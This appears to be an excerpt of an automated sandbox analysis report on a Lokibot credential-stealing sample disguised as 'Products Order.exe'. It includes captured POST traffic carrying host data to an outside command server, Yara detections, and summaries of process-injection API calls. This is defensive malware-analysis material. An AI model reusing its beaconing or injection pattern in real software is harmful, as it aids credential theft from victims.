Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
52	192.168.2.5	49766	45.90.57.51	80	5352	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
May 16, 2024 00:38:35.693093061 CEST	240	OUT	POST /big/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 45.90.57.51 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: BBECE576 Content-Length: 153 Connection: close
May 16, 2024 00:38:35.934741020 CEST	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons134349ALFONS-PC0FDD42EE188E931437F4FBE2C
May 16, 2024 00:38:36.199531078 CEST	236	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Wed, 15 May 2024 22:38:36 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
53	192.168.2.5	49767	45.90.57.51	80	5352	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
May 16, 2024 00:38:37.577907085 CEST	240	OUT	POST /big/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 45.90.57.51 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: BBECE576 Content-Length: 153 Connection: close
May 16, 2024 00:38:37.818737984 CEST	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons134349ALFONS-PC0FDD42EE188E931437F4FBE2C
May 16, 2024 00:38:38.095021009 CEST	236	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Wed, 15 May 2024 22:38:37 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
54	192.168.2.5	49768	45.90.57.51	80	5352	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
May 16, 2024 00:38:39.485061884 CEST	240	OUT	POST /big/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 45.90.57.51 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: BBECE576 Content-Length: 153 Connection: close
May 16, 2024 00:38:39.726444960 CEST	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons134349ALFONS-PC0FDD42EE188E931437F4FBE2C
May 16, 2024 00:38:39.999092102 CEST	236	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Wed, 15 May 2024 22:38:39 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
55	192.168.2.5	49769	45.90.57.51	80	5352	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
May 16, 2024 00:38:41.388890982 CEST	240	OUT	POST /big/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 45.90.57.51 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: BBECE576 Content-Length: 153 Connection: close
May 16, 2024 00:38:41.627592087 CEST	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons134349ALFONS-PC0FDD42EE188E931437F4FBE2C
May 16, 2024 00:38:41.892699957 CEST	236	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Wed, 15 May 2024 22:38:41 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
56	192.168.2.5	49770	45.90.57.51	80	5352	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
May 16, 2024 00:38:43.272419930 CEST	240	OUT	POST /big/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 45.90.57.51 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: BBECE576 Content-Length: 153 Connection: close
May 16, 2024 00:38:43.505400896 CEST	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons134349ALFONS-PC0FDD42EE188E931437F4FBE2C
May 16, 2024 00:38:43.763044119 CEST	236	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Wed, 15 May 2024 22:38:43 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
57	192.168.2.5	49771	45.90.57.51	80	5352	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
May 16, 2024 00:38:45.151547909 CEST	240	OUT	POST /big/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 45.90.57.51 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: BBECE576 Content-Length: 153 Connection: close
May 16, 2024 00:38:45.387999058 CEST	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons134349ALFONS-PC0FDD42EE188E931437F4FBE2C
May 16, 2024 00:38:45.647664070 CEST	236	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Wed, 15 May 2024 22:38:45 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
58	192.168.2.5	49772	45.90.57.51	80	5352	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
May 16, 2024 00:38:47.045717955 CEST	240	OUT	POST /big/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 45.90.57.51 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: BBECE576 Content-Length: 153 Connection: close
May 16, 2024 00:38:47.284497976 CEST	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons134349ALFONS-PC0FDD42EE188E931437F4FBE2C
May 16, 2024 00:38:47.548430920 CEST	236	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Wed, 15 May 2024 22:38:47 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
59	192.168.2.5	49773	45.90.57.51	80	5352	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
May 16, 2024 00:38:50.123310089 CEST	240	OUT	POST /big/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 45.90.57.51 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: BBECE576 Content-Length: 153 Connection: close
May 16, 2024 00:38:50.359797001 CEST	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons134349ALFONS-PC0FDD42EE188E931437F4FBE2C
May 16, 2024 00:38:50.619827986 CEST	236	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Wed, 15 May 2024 22:38:50 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
60	192.168.2.5	49774	45.90.57.51	80	5352	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
May 16, 2024 00:38:52.000180006 CEST	240	OUT	POST /big/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 45.90.57.51 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: BBECE576 Content-Length: 153 Connection: close
May 16, 2024 00:38:52.240966082 CEST	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons134349ALFONS-PC0FDD42EE188E931437F4FBE2C
May 16, 2024 00:38:52.514468908 CEST	236	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Wed, 15 May 2024 22:38:52 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
61	192.168.2.5	49775	45.90.57.51	80	5352	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
May 16, 2024 00:38:53.898130894 CEST	240	OUT	POST /big/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 45.90.57.51 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: BBECE576 Content-Length: 153 Connection: close
May 16, 2024 00:38:54.132042885 CEST	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons134349ALFONS-PC0FDD42EE188E931437F4FBE2C
May 16, 2024 00:38:54.389626026 CEST	236	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Wed, 15 May 2024 22:38:54 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Target ID:	0
Start time:	00:36:49
Start date:	16/05/2024
Path:	C:\Users\user\Desktop\Products Order.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\Desktop\Products Order.exe"
Imagebase:	0x430000
File size:	775'680 bytes
MD5 hash:	AB09F11DDB556069549717CC1F37FDC1
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000000.00000002.1969470285.0000000012AA6000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000000.00000002.1969470285.0000000012AA6000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.1969470285.0000000012AA6000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Lokibot_1f885282, Description: unknown, Source: 00000000.00000002.1969470285.0000000012AA6000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Lokibot_0f421617, Description: unknown, Source: 00000000.00000002.1969470285.0000000012AA6000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000000.00000002.1969470285.0000000012AA6000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000000.1960275029.00000000004B6000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000000.00000002.1967088480.0000000002A2D000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000000.00000002.1967088480.0000000002A2D000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.1967088480.0000000002A2D000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Lokibot_1f885282, Description: unknown, Source: 00000000.00000002.1967088480.0000000002A2D000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Lokibot_0f421617, Description: unknown, Source: 00000000.00000002.1967088480.0000000002A2D000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000000.00000002.1967088480.0000000002A2D000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	00:36:50
Start date:	16/05/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
Imagebase:	0x10000
File size:	56'368 bytes
MD5 hash:	FDA8C8F2A4E100AFB14C13DFCBCAB2D2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000002.00000002.3204702341.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000002.00000002.3204702341.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000002.3204702341.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Lokibot_1f885282, Description: unknown, Source: 00000002.00000002.3204702341.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Lokibot_0f421617, Description: unknown, Source: 00000002.00000002.3204702341.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown Rule: Loki_1, Description: Loki Payload, Source: 00000002.00000002.3204702341.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: kevoreilly Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000002.00000002.3204702341.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group Rule: INDICATOR_SUSPICIOUS_GENInfoStealer, Description: Detects executables containing common artifcats observed in infostealers, Source: 00000002.00000002.3204702341.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen Rule: JoeSecurity_Lokibot_1, Description: Yara detected Lokibot, Source: 00000002.00000002.3204897255.0000000000778000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Reputation:	moderate
Has exited:	false

Show Windows behavior

Execution Graph

Execution Coverage:	24.6%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	15
Total number of Limit Nodes:	0

Callgraph

Executed
Not Executed
Opacity -> Relevance
Disassembly available

Executed Functions

Function 00007FF848F13535 Relevance: 2.0, APIs: 1, Instructions: 462
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessA.KERNELBASE ref: 00007FF848F139E1

Memory Dump Source

Source File: 00000000.00000002.1971039237.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff848f10000_Products Order.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: a3c14da99e1a65842fc476ea2f37c405b3eff33ee6e7f2d08c0834e52e5f955c
Instruction ID: 0ed0a131770322dda4c2f05e67c7e2630e8f4ca26d138d82c2174b3a2f57bc17
Opcode Fuzzy Hash: a3c14da99e1a65842fc476ea2f37c405b3eff33ee6e7f2d08c0834e52e5f955c
Instruction Fuzzy Hash: EAF18F70919A8D8FEBA8EF18C8597E977E1FB59300F00412EDC4ED7291DB785A84CB85

Function 00007FF848F13F6D Relevance: 1.7, APIs: 1, Instructions: 214
injectionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WriteProcessMemory.KERNELBASE ref: 00007FF848F140E2

Memory Dump Source

Source File: 00000000.00000002.1971039237.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff848f10000_Products Order.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: 336001c5bb9605e0f662b860b26eb95c1dec9e57aed15c2a7ce276f8666eda4d
Instruction ID: 3c8a0e39f7f76db837801d810ed5eeb469807d2d803ecf14e21c6460ba38e1df
Opcode Fuzzy Hash: 336001c5bb9605e0f662b860b26eb95c1dec9e57aed15c2a7ce276f8666eda4d
Instruction Fuzzy Hash: E8614970908A5C8FDB98DF58C885BE9BBF1FB69310F1082AAD44DE3255CB34A985CF40

Function 00007FF848F13BEA Relevance: 1.7, APIs: 1, Instructions: 193
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Wow64SetThreadContext.KERNELBASE ref: 00007FF848F13D35

Memory Dump Source

Source File: 00000000.00000002.1971039237.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff848f10000_Products Order.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: 88db76ad0eb66fd3041c2b655f0bb89fcd2f0b0858021af27899f80173fc62c2
Instruction ID: facd82530c56bfda62d4d06f4c7c01c1407952f65b94254b8b4f0238e7b166ed
Opcode Fuzzy Hash: 88db76ad0eb66fd3041c2b655f0bb89fcd2f0b0858021af27899f80173fc62c2
Instruction Fuzzy Hash: BF517C70C0964D8FEB55DFA8C845BE9BBF1FF55310F1482AAD048E7292CB789885CB50

Function 00007FF848F142CD Relevance: 1.7, APIs: 1, Instructions: 187
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAllocEx.KERNELBASE ref: 00007FF848F14407

Memory Dump Source

Source File: 00000000.00000002.1971039237.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff848f10000_Products Order.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: c793778bbee1f62cb06598881a9fc64c5aafcefbb2e3284aa6ef082433539049
Instruction ID: 0320cc3069cd2c18161421729a32c6d99a8a1e4d05ceb32c15c8219efd0c1feb
Opcode Fuzzy Hash: c793778bbee1f62cb06598881a9fc64c5aafcefbb2e3284aa6ef082433539049
Instruction Fuzzy Hash: CD513770D0864C8FDB94EF58C885BE9BBF1FBA9310F1082AAD44DE3255DB34A8858F44

Function 00007FF848F1447D Relevance: 1.6, APIs: 1, Instructions: 141
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ResumeThread.KERNELBASE ref: 00007FF848F1454F

Memory Dump Source

Source File: 00000000.00000002.1971039237.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff848f10000_Products Order.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: 0171910073687a28403d97a5878babd3515dd6c1549f7f78118d2b41aedfcaff
Instruction ID: 64b40253b51e309d6315e606f77e8be61f913240387d534efa9babffcf923f2e
Opcode Fuzzy Hash: 0171910073687a28403d97a5878babd3515dd6c1549f7f78118d2b41aedfcaff
Instruction Fuzzy Hash: E7413C70D0864D8FDB58EFA8D885AEDBBF1FB56310F10416AD409E7252DB74A885CB41

Analysis Process: aspnet_compiler.exePID: 5352, Parent PID: 3436COMMON

Execution Graph

Execution Coverage:	30.7%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	4.4%
Total number of Nodes:	1846
Total number of Limit Nodes:	92

Executed Functions

Function 00403D74 Relevance: 14.2, APIs: 4, Strings: 4, Instructions: 200
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FindFirstFileW.KERNELBASE(00000000,?,00000000,D4F4ACEA,00000000,00000000,00000001,00000000,00000000), ref: 00403DC4
FindNextFileW.KERNELBASE(00000000,00000010,00000000,CE4477CC,00000000,00000000), ref: 00403E8C
FindFirstFileW.KERNELBASE(00000000,?,00000000,D4F4ACEA,00000000,00000000,00000001,00000000,00000000), ref: 00403EDB
FindNextFileW.KERNELBASE(00000000,00000010,00000000,CE4477CC,00000000,00000000), ref: 00403F58

Strings

%s\%s, xrefs: 00403E3A, 00403EAF, 00403F1C
Windows, xrefs: 00403DEA
%s\*, xrefs: 00403D99
Program Files, xrefs: 00403E01

Memory Dump Source

Source File: 00000002.00000002.3204702341.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd

Yara matches

Similarity

API ID: FileFind$FirstNext
String ID: %s\%s$%s\*$Program Files$Windows
API String ID: 1690352074-2009209621
Opcode ID: 1e3e6a10e2b9ec909b5a5a789c8a5300318a12692afde49798013ba2296699ae
Instruction ID: acb13e71dd503001dda9649917d64d786dba47cd8022a2b45c5045a1a8a297e9
Opcode Fuzzy Hash: 1e3e6a10e2b9ec909b5a5a789c8a5300318a12692afde49798013ba2296699ae
Instruction Fuzzy Hash: A651F3329006197AEB14AEB4DD8AFAB3B6CDB45719F10013BF404B51C1EA7CEF80865C

Function 0040650A Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 67COMMON

Download Yara Rule

APIs

LookupPrivilegeValueW.ADVAPI32(00000000,SeDebugPrivilege,?,00000009,C6C3ECBB,00000000,00000000,?,00000000,?,?,?,?,?,0040F9DC), ref: 0040654E
AdjustTokenPrivileges.KERNELBASE(?,00000000,?,00000010,00000000,00000000,00000009,C1642DF2,00000000,00000000,00000000,?,00000000), ref: 00406589

Strings

SeDebugPrivilege, xrefs: 00406548

Memory Dump Source

Source File: 00000002.00000002.3204702341.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd

Yara matches

Similarity

API ID: AdjustLookupPrivilegePrivilegesTokenValue
String ID: SeDebugPrivilege
API String ID: 3615134276-2896544425
Opcode ID: e2948c256eaff89fcf02f3bc2ef1638e4caf3df8a7acb90b2cc554f1a6e3f5aa
Instruction ID: 1578144bc241a5b33ff73db231d5495ab0f4fd5df9d31338026c5631bf24f4b3
Opcode Fuzzy Hash: e2948c256eaff89fcf02f3bc2ef1638e4caf3df8a7acb90b2cc554f1a6e3f5aa
Instruction Fuzzy Hash: A1117331A00219BAD710EEA79D4AEAF7ABCDBCA704F10006EB504F6181EE759B018674

Function 00402B7C Relevance: 3.0, APIs: 2, Instructions: 20memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,?,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E), ref: 00402B85
RtlAllocateHeap.NTDLL(00000000,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E,00000000), ref: 00402B8C

Memory Dump Source

Source File: 00000002.00000002.3204702341.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd

Yara matches

Similarity

API ID: Heap$AllocateProcess
String ID:
API String ID: 1357844191-0
Opcode ID: 06d42fc3960a44692cfa347aceea0432181886377ca781978571395af1b358ed
Instruction ID: b98118a04cfb303fc975c2cf6dbcabe8739d57b69ee549b18d4bacd194132a09
Opcode Fuzzy Hash: 06d42fc3960a44692cfa347aceea0432181886377ca781978571395af1b358ed
Instruction Fuzzy Hash: 14D05E36A01A24B7CA212FD5AC09FCA7F2CEF48BE6F044031FB0CAA290D675D91047D9

Function 00404ED4 Relevance: 1.5, APIs: 1, Instructions: 9networkCOMMON

Download Yara Rule

APIs

recv.WS2_32(00000000,00000000,00000FD0,00000000), ref: 00404EE2

Memory Dump Source

Source File: 00000002.00000002.3204702341.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd

Yara matches

Similarity

API ID: recv
String ID:
API String ID: 1507349165-0
Opcode ID: 21ce8f986ded34978476a8ad781d548340edbce2afa6bcd3c515a11396da2d1b
Instruction ID: cd18cecc4e97c8ae47002f9e4185d290addc31a5a75b3629954b28b764c5713b
Opcode Fuzzy Hash: 21ce8f986ded34978476a8ad781d548340edbce2afa6bcd3c515a11396da2d1b
Instruction Fuzzy Hash: 6EC0483204020CFBCF025F81EC05BD93F2AFB48760F448020FA1818061C772A520AB88

Function 004061C3 Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 151
COMMON

